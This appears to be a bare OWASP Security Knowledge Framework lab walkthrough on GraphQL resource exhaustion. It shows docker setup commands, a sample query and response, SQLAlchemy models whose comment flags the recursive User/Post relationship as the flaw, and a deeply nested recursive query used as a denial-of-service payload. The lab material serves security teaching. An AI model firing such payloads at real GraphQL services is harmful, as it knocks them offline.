$ sudo docker pull blabla1337/owasp-skf-lab:graphql-dos-resource-exhaustion$ sudo docker run -ti -p 127.0.0.1:5000:5000 blabla1337/owasp-skf-lab:graphql-dos-resource-exhaustionquery: "{
allPosts {
edges {
node {
title
body
users
{ username }
}
}
}
}"{
"data": {
"allPosts": {
"edges": [
{
"node": {
"title": "Hello World",
"body": "This is the first post of jhon",
"users": {
"username": "johndoe"
}
}
},
{
"node": {
"title": "Woooow",
"body": "I'm the maaaaask",
"users": {
"username": "jimcarry"
}
}
},
{
"node": {
"title": "Second Post Jhon",
"body": "This is the second post of jhon",
"users": {
"username": "johndoe"
}
}
}
]
}
}
}class User(db.Model):
__tablename__ = 'users'
uuid = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(256), index=True, unique=True)
posts = db.relationship('Post', backref='users') ## HERE is the problem, that enables to create recursive queries
def __repr__(self):
return '<User %r>' % self.username
class Post(db.Model):
__tablename__ = 'posts'
uuid = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(256), index=True)
body = db.Column(db.Text)
author_id = db.Column(db.Integer, db.ForeignKey('users.uuid'))
author = db.relationship('User', backref='post')
def __repr__(self):
return '<Post %r>' % self.title
{
allUsers {
edges {
node {
username
posts {
edges {
node {
title
authorId
users {
username
posts {
edges {
node {
title
body
users {
username
uuid
username
uuid
posts {
edges {
node {
title
body
users {
username
posts {
edges {
node {
title
body
users {
posts {
edges {
node {
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
users {
posts {
edges {
node {
body
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
